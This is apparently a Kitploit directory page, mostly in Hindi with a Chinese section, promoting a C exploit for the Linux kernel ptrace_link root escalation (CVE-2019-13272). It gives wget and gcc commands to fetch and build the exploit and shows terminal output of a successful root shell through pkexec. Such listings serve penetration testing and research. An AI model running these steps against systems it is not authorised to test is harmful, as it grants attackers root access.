Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-13272 — C-आधारित स्थानीय विशेषाधिकार वृद्धि शोषण जो Linux kernel ptrace_link क्रेडेंशियल गलत प्रबंधन (CVE-2019-13272) को लक्षित करता है, 4.10 < 5.1.17 कर्नेल पर रूट एक्सेस के लिए। | Kitploit
उपकरण/GitHubGitHub/letsr00t/cve-2019-13272
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगबाइनरी शोषण
GitHubletsr00t/cve-2019-13272

CVE-2019-13272

C-आधारित स्थानीय विशेषाधिकार वृद्धि शोषण जो Linux kernel ptrace_link क्रेडेंशियल गलत प्रबंधन (CVE-2019-13272) को लक्षित करता है, 4.10 < 5.1.17 कर्नेल पर रूट एक्सेस के लिए।

रिपॉजिटरी देखें
9 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-13272 लिनक्स स्थानीय रूट शोषण

लिनक्स 4.10 < 5.1.17 PTRACE_TRACEME स्थानीय रूट (CVE-2019-13272)

asciicast

root@kitploit:~
लिनक्स कर्नेल 5.1.17 से पहले,
kernel/ptrace.c में ptrace_link एक ऐसी प्रक्रिया के क्रेडेंशियल्स की रिकॉर्डिंग को गलत तरीके से संभालता है जो एक ptrace संबंध बनाना चाहती है,
जो स्थानीय उपयोगकर्ताओं को मूल-बाल प्रक्रिया संबंध के साथ कुछ परिदृश्यों का लाभ उठाकर रूट पहुंच प्राप्त करने की अनुमति देता है,
जहां एक मूल प्रक्रिया विशेषाधिकार छोड़ती है और execve को कॉल करती है (संभावित रूप से एक हमलावर द्वारा नियंत्रण की अनुमति देता है)।
एक योगदान कारक एक ऑब्जेक्ट जीवनकाल समस्या है (जो घबराहट का कारण भी बन सकती है)।
एक अन्य योगदान कारक ptrace संबंध को विशेषाधिकार प्राप्त के रूप में गलत चिह्नित करना है, जो (उदाहरण के लिए) Polkit के pkexec सहायक के साथ PTRACE_TRACEME का उपयोग करके शोषण योग्य है।
नोट: SELinux deny_ptrace कुछ वातावरणों में एक उपयोगी समाधान हो सकता है।

在5.1.17之前的Linux内核中,
kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,
这允许本地用户通过利用父子的某些方案来获取root访问权限 进程关系,父进程删除权限并调用execve(可能允许攻击者控制)。
一个影响因素是对象寿命问题(也可能导致恐慌)。 
另一个影响因素是将ptrace关系标记为特权,这可以通过(例如)Polkit的pkexec帮助程序与PTRACE_TRACEME进行利用。 
注意:在某些环境中,SELinux deny_ptrace可能是一种可用的解决方法。

wget https://raw.githubusercontent.com/jas502n/CVE-2019-13272/master/CVE-2019-13272.c

gcc -s CVE-2019-13272.c -o pwned

root@kitploit:~
jas502n@Study:~/Desktop/CVE-2019-13272$ ./pwned 
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)                 
[.] Checking environment ...                                                   
[~] Done, looks good                                                           
[.] Searching for known helpers ...                                            
[~] Found known helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper    
[.] Using helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper          
[.] Spawning suid process (/usr/bin/pkexec) ...                                
[.] Tracing midpid ...                                                         
[~] Attached to midpid                                                         
To run a command as administrator (user "root"), use "sudo <command>".         
See "man sudo_root" for details.                                               
                                                                               
root@Study:/home/jas502n/Desktop/CVE-2019-13272#

CVE-2019-13272 के लिए जान हॉर्न के शोषण का अद्यतन संस्करण।

https://bugs.chromium.org/p/project-zero/issues/detail?id=1903

टूल डाउनलोड करें